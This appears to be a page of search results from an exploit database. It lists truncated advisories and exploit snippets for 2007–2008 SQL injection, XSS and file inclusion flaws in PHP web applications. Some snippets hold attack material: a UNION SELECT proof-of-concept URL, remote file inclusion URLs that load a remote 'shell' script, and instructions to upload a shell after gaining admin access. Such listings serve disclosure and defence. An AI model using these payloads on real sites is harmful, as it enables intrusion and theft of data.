142 matches found
HoMaP-CMS 0.1 (index.php go) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications =============================================================== HoMaP-CMS 0.1 index.php go Remote SQL Injection Vulnerability ===============================================================...
Carscripts Classifieds (index.php cat) Remote SQL Injection Vulnerability
No description provided by source. Carscripts Classifieds Sql INjection By Stack Home v4-team.com + : you can see the Result in 'Title' + : Open the source page to see the result poc : http://site.co.il/index.php?cat=-1//UNION//SELECT//concatchar58,user,version,database,2,3/ live demo...
CVE-2008-1787
Multiple cross-site scripting XSS vulnerabilities in index.php in Poplar Gedcom Viewer 2.0 allow remote attackers to inject arbitrary web script or HTML via the 1 text and 2 ul parameters. NOTE: the provenance of this information is unknown; the details are obtained solely from third party...
Picture Rating 1.0 - Blind SQL Injection
!/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has admin you can upload a shell, click...
phpaddressbook-sql.txt
php-addressbook v2.0 SQL Injection Vulnerbility admin Authentication bypass Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By : hadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all iranian hackerz greetz:to my best friend in the...
Sql injection
SQL injection vulnerability in index.php in the comiomezun component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in an edit action...
SetCMS 3.6.5 (setcms.org) Remote Command Execution Exploit
Exploit for unknown platform in category web applications ========================================================== SetCMS 3.6.5 setcms.org Remote Command Execution Exploit ========================================================== !/usr/bin/perl SetCMS v3.6.5 setcms.org remote commands executio...
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications ========================================================= w-Agora = 4.2.1 cat Remote SQL Injection Vulnerability ========================================================= W-Agora = 4.2.1 Class: SQL Injection Found: 30/12/2007 Remote: Yes...
ThemeSiteScript 1.0 (index.php loadadminpage) RFI Vulnerability
Exploit for unknown platform in category web applications =============================================================== ThemeSiteScript 1.0 index.php loadadminpage RFI Vulnerability =============================================================== . . NN NNNN JNNN NNNN. NNN NNNNNNNNNNN NN NN...
ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability
No description provided by source. -------------------------------------------------------------- ezContents Version 1.4.5 Remote File Disclosure Vulnerability. -------------------------------------------------------------- download : http://www.visualshapers.com/ author : p4imi0 contact :...
CVE-2007-5920
index.php in Domenico Mancini PicoFlat CMS before 0.4.18 allows remote attackers to include certain files via unspecified vectors, possibly due to a directory traversal vulnerability. NOTE: this can be leveraged to bypass authentication and upload files by including picoinsert.php or unspecified...
nuboard-rfi.txt
nuBoard 0.5 index.php site Remote File Inclusion Vulnerability http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboardv0.5.tar.gz /nuboardv0.5/admin/index.php?site=http://localhost/scripts/020.txt?...
Design/Logic Flaw
index.php in Ryan Haudenschilt Family Connections FCMS before 0.9 allows remote attackers to access an arbitrary account by placing the account's name in the value of an fcmsloginid cookie. NOTE: this can be leveraged for code execution via a POST with PHP code in the content parameter...
PT-2007-5361 · Xuyiyang · Blue Memories Theme
Cross-site scripting XSS vulnerability in index.php in the Blue Memories theme 1.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, possibly a related issue to CVE-2007-2757 and CVE-2007-4014. NOTE: the provenance of this information is unknown; th...
CVE-2007-4028
Absolute path traversal vulnerability in index.php in Webspell 4.01.02 allows remote attackers to include and execute arbitrary local files via a full pathname in the site parameter. NOTE: some of these details are obtained from third party information...
PHPBandManager 0.8 - index.php?pg Remote File Inclusion
PHPBandManager 0.8 - index.php?pg Remote File Inclusion author:koray greetz:cigicigi.net script:http://sourceforge.net/projects/phpbandmanager allowurlfopen:on or registerglobals:on vuln; /bandmanager/suite/index.php include$GET'pg'.".php"; example; http://www.victim.com/suite/index.php?pg=shell...
CVE-2007-1612
SQL injection vulnerability in index.php in Katalog Plyt Audio 1.0 and earlier allows remote attackers to execute arbitrary SQL commands via the kolumna parameter...
DEBIAN-CVE-2007-1395
Incomplete blacklist vulnerability in index.php in phpMyAdmin 2.8.0 through 2.9.2 allows remote attackers to conduct cross-site scripting XSS attacks by injecting arbitrary JavaScript or HTML in a 1 db or 2 table parameter value followed by an uppercase end tag, which bypasses the protection...
HC Newssystem 1.0-1.4 - 'index.php?ID' SQL Injection
HC NEWSSYSTEM 1.0-4 index.php "ID" Blind SQL Injection Type : SQL Injection Release Date : 2007-03-08 Product / Vendor : HC Design News Publisher. http://www.hcdesign.at/demo Bug : http://localhost/script/index.php?option=news&aktion=komm&ID=-SQL Inj.- SQL Inj Code : Admin Username/Password Query...
flashgame154-rfi.txt
-------------------------------------------------------- Author : JuMp-Er Date : feb, 21th 2007 Level : Dangerous contact: : aH-crewathotmaildotcom -------------------------------------------------------- Software description -------------------------------------------------------- App...